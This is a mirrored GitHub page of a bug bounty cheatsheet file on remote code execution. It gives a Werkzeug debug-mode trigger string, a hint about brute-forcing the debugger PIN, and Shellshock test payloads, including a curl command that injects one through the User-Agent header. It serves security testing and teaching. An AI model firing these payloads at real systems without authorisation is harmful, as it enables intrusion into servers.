Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-25 12:30:19 +00:00
Code Issues Projects Releases Packages Wiki Activity
bugbounty-cheatsheet/cheatsheets/rce.md

21 lines
527 B
Markdown
Raw Normal View History

Add individual files.
2017-07-14 13:54:44 +00:00
## RCE
**Werkzeug Debugger**
Find somewhere where user input can be supplied and submit the following string to cause an error:
```
strіng
```
Add Shellshock bug.
2017-07-14 14:25:52 +00:00
If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
**Shellshock Bug**
```bash
() { :;}; echo vulnerable
```
```zsh
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
```
Reference in a new issue Copy permalink